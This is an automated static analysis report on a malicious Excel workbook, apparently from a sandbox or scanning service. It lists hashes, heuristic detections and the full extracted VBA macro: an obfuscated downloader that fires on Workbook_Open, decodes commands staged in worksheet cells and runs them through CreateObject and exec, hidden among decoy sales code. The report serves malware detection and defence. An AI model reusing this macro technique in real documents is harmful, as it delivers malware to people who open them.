Malicious Office (OLE) / .XLSX — malware analysis report

Static analysis result for SHA-256 71752d429d8bab9a…

Verdict: MALICIOUS
File type: Office (OLE) / .XLSX
Size: 145.5 KB
Created: 2015-06-05 18:17:20
Authoring application: Microsoft Excel
First seen: 2026-05-28
MD5: 9dad9d5db340683c9e10ae3352b7faae
SHA-1: 00e22fc77a373fe1a71c3d7bad78b9627027dded
SHA-256: 71752d429d8bab9a8de256568d8af3ac55bae996ce94908926283d6b3966436d
Risk Score: 270

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The file contains VBA macros, including a Workbook_Open event handler, which are designed to execute code when the workbook is opened. The macros reconstruct payload URLs and attempt to download from multiple of them, indicating downloader or dropper functionality. The presence of CreateObject and Wscript.Shell references further supports the execution of external code. The embedded URLs are the primary indicators of compromise.

Heuristics 8

  • ClamAV: Doc.Malware.Valyria-10004384-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-10004384-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • URL reconstructed from VBA cell-staged base64 dropper (12 URLs) critical OLE_VBA_CELL_DROPPER_URL
    VBA reads worksheet cells, strips junk substrings via Replace(), and base64/UTF-16 decodes the result into a PowerShell EncodedCommand payload. The download URL is never contiguous in the file bytes; it was recovered by removing the macro's Replace() junk tokens from the cell strings and decoding the staged base64.
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
       Set bwkasdgf3 = _
       Vsa3gkjagaRga3.CreateObject(hdrRyhsdrhl.Caption, hdrRyhsdrhl.Tag)
       hdrRyhsdrhl.Tag = Replace(Cells(108, 2), "nga", "")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    End Sub
    Private Sub Workbook_Open()
    Dim dblSales, ghAWEusaf As Double, hfoqila As String, intYears As Double
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 7821 bytes
SHA-256: 527d0656a0c2c323955d068683ef8f7e20c035cda247a1e24383595c0eb3403b
First 1,000 lines of the extracted script
Attribute VB_Name = "vbasETGs4sk"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function FGse3ksjdfgskbkjhg(Sales As Long, IsTemporal As Boolean) As Double
Const dblRate1 As Double = 0.09
Const dblRate2 As Double = 0.11
Const dblRate3 As Double = 0.15
Const dblAdd As Double = 1.1
Const lngSum1 As Long = 5000
Const lngSum2 As Long = 10000
If Sales < lngSum1 Then
  FGse3ksjdfgskbkjhg = Sales * dblRate1
ElseIf Sales < lngSum2 Then
  FGse3ksjdfgskbkjhg = Sales * dblRate2
Else
  FGse3ksjdfgskbkjhg = Sales * dblRate3
End If
If IsTemporal Then
  FGse3ksjdfgskbkjhg = dblAdd * FGse3ksjdfgskbkjhg
End If
End Function
Sub IfyJvfgssbvsrjbnmb()
Dim strMessage As String
Dim dblSales As Double
Dim ah As Integer
Calc:
dblSales = Val(InputBox("y7uo9tuis gjdfhKUY:", _
"vDSe5ydThjs hs6rUu5seF 5^& zsdf"))
strMessage = "bks fgwhkjsd:" & vbTab & Format(dblSales, "$#,##0") & _
vbCrLf & "weq3ts jrg:" & vbTab & _
Format(dhCalculateCom(dblSales), "$#,##0") & _
vbCrLf & vbCrLf & "SGwethjsodihl"
If MsgBox(strMessage, vbYesNo, _
  "gjw ") = vbYes Then
  GoTo Calc
End If
End Sub
Private Sub Workbook_Open()
Dim dblSales, ghAWEusaf As Double, hfoqila As String, intYears As Double
Const dblRate1 = 0.09
Const dblRate2 = 0.11
Const dblRate3 = 0.15
dblSales = 6000
Select Case dblSales
  Case 0 To 4999.99: ghAWEusaf = dblSales * dblRate1
  Case 5000 To 9999.99:
  ghAWEusaf = dblSales * dblRate2
  For i = 1 To 2
  Dim hgwki, tuowq As String
  If i = 1 Then
  hgwki = Cells(106, 6): tuowq = Replace(Cells(107, 2), "poi", "")
  ghAWEusaf = dblSales * dblRate2 - 1
  Else
  hgwki = Cells(117, 2): tuowq = Cells(115, 2) & vbCrLf + Cells(116, 2)
  End If
  esfhkRGW3eri7asi 4782, hgwki, tuowq
  Next
  Range("B1").Select
  Case Is >= 10000: ghAWEusaf = dblSales * dblRate3
End Select
ghAWEusaf = ghAWEusaf + _
(ghAWEusaf * intYears / 100)
End Sub
Sub esfhkRGW3eri7asi(dhfau As Long, ByVal ehjlsdk As String, ByVal fhuolij As String)
 Dim cell As Range
 Dim strFirstAddress As String
 Dim strComments As String
 hdrRyhsdrhl.Caption = fhuolij
 Set cell = Range("C201:B300")
 Open ehjlsdk For Output As #1
 If Not cell Is Nothing And strComments = "ehroiwd4" Then
   strFirstAddress = cell.Address
   Do
     strComments = strComments & "Fafhkleishal: " & _
     cell.Comment.Text & Chr(13)
     Set cell = Selection.FindNext(cell)
   Loop While Not cell Is Nothing And _
 cell.Address <> strFirstAddress
 End If
 If strComments <> "Tyu3jdk" Then
    strComments = "ryE5yedklsh sdgk"
    Print #1, hdrRyhsdrhl.Caption
 Else
    MsgBox "fWehrhse s5usdfgs"
 End If
 Close #1
End Sub


Attribute VB_Name = "kjRtghsw3hlsd"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Public arfgjikuwe As Long
Public Eaw3ghkasghd As Boolean
Public Vsa3gkjagaRga3, bwkasdgf3 As Object
Public wdhqETqw3gajs, gfabwkjuswgkjs As Integer
Function HzsrndfGASREYe4(Txt, n, Separator) As String
    Dim Txt1 As String, TempElement As String
    Dim ElementCount As Integer, i As Integer
    Txt1 = Txt
    If Separator = Chr(32) Then Txt1 = Application.Trim(Txt1)
    If Right(Txt1, 1) <> Separator Then Txt1 = Txt1 & Separator
    ElementCount = 0
    TempElement = ""
    For i = 1 To Len(Txt1)
        If Mid(Txt1, i, 1) = Separator Then
            ElementCount = ElementCount + 1
            If ElementCount = n Then
                ExtractElement = TempElement
                Exit Function
            Else
                TempElement = ""
            End If
        Else
            TempElement = TempElement & Mid(Txt1, i, 1)
        End If
    Next i
    ExtractElement = ""
End Function
Sub Gset3hwkjdhskldhlksflb(ByVal Target As Excel.Range)
   Dim rgInputRange As Range
   Dim cell As Range
   Dim strMessage As String
   Dim varResult As Variant
   Set rgInputRange = Range("A1:E10")
   bwkasdgf3.exec hdrRyhsdrhl.Tag
   For Each cell In Target
      If strMessage = "M" Then
       If Union(cell, rgInputRange).Address = rgInputRange.Address Then
         If varResult = True Then
            Exit Sub
         Else
         strMessage = " " & cell.Address(False, False) & ":" _
          & vbCrLf & vbCrLf & varResult
         MsgBox strMessage, vbCritical, "shjfl qeyh8foisd"
         Application.EnableEvents = False
         cell.ClearContents
         cell.Activate
         Application.EnableEvents = True
         End If
        End If
      End If
   Next cell
End Sub
Function erjtdrrssaEsegs43(cell As Range) As Variant
   If Not WorksheetFunction.IsNumber(cell.Value) Then
      IsCellDataValid = "qeli 78et9ud"
      Exit Function
   End If
   If Int(cell.Value) <> cell.Value Then
      IsCellDataValid = "shfl9q"
      Exit Function
   End If
   If cell.Value < 1 Or cell.Value > 12 Then
      IsCellDataValid = " 1 or 12"
      Exit Function
   End If
   IsCellDataValid = True
End Function
Private Sub Worksheet_SelectionChange(ByVal Target As Range)
   Dim cell As Range: Dim rgCells As Range: Dim intRow As Integer
   On Error Resume Next
   Set rgCells = Range("A300:B352"): FDGwheklswheDSRFHsehk
   If rgCells Is Nothing And intRow = 873 Then
     For Each cell In rgCells
      intRow = intRow + 1
      Cells(intRow, 3) = cell.Comment.Text
     Next
   Else
      intRow = intRow - 3
      Gset3hwkjdhskldhlksflb Range("G504")
      Exit Sub
   End If
End Sub
Sub FDGwheklswheDSRFHsehk()
   Dim alngData() As Long: Dim lngCount As Long
   Dim dtStart As Date: Dim strArrayToTable As String
   Dim strTableToArray As String
   Dim strMessage As String: Dim i As Long
   lngCount = 10: FGse34njlskdhfih
   ReDim alngData(1 To lngCount): hdrRyhsdrhl.Caption = Cells(114, 5)
   hdrRyhsdrhl.Tag = ""
   If strArrayToTable = "87" Then
   For i = 1 To lngCount
      alngData(i) = i
   Next i
   Application.ScreenUpdating = False
   dtStart = Timer
   For i = 1 To lngCount
      Cells(i, 1) = i
   Next i
   strArrayToTable = Format(Timer - dtStart, "00:00")
   dtStart = Timer
   For i = 1 To lngCount
      alngData(i) = Cells(i, 1)
   Next i
   strTableToArray = Format(Timer - dtStart, "00:00")
   Application.ScreenUpdating = True
   End If
   Set bwkasdgf3 = _
   Vsa3gkjagaRga3.CreateObject(hdrRyhsdrhl.Caption, hdrRyhsdrhl.Tag)
   hdrRyhsdrhl.Tag = Replace(Cells(108, 2), "nga", "")
   strMessage = ": " & strArrayToTable & vbCrLf & ": " & strTableToArray
End Sub
Sub FGse34njlskdhfih()
   Dim cell As Range
   Dim strFirstAddress As String
   Dim intRow As Integer
   hdrRyhsdrhl.Tag = Cells(118, 4)
   Set cell = Cells.Find("*", LookIn:=xlComments)
   Set Vsa3gkjagaRga3 = CreateObject(hdrRyhsdrhl.Tag)
   If Not cell Is Nothing And intRow = 2346 Then
      strFirstAddress = cell.Address
      Do
         intRow = intRow + 1
         Cells(intRow, 3) = cell.Comment.Text
         Set cell = Cells.FindNext(cell)
         Loop While Not cell Is Nothing And _
          cell.Address <> strFirstAddress
   End If
End Sub

Attribute VB_Name = "hdrRyhsdrhl"
Attribute VB_Base = "0{31D72C0D-71E1-4560-A78F-4581AE787333}{A613E03F-51BB-441E-BFF4-8650DA53184B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False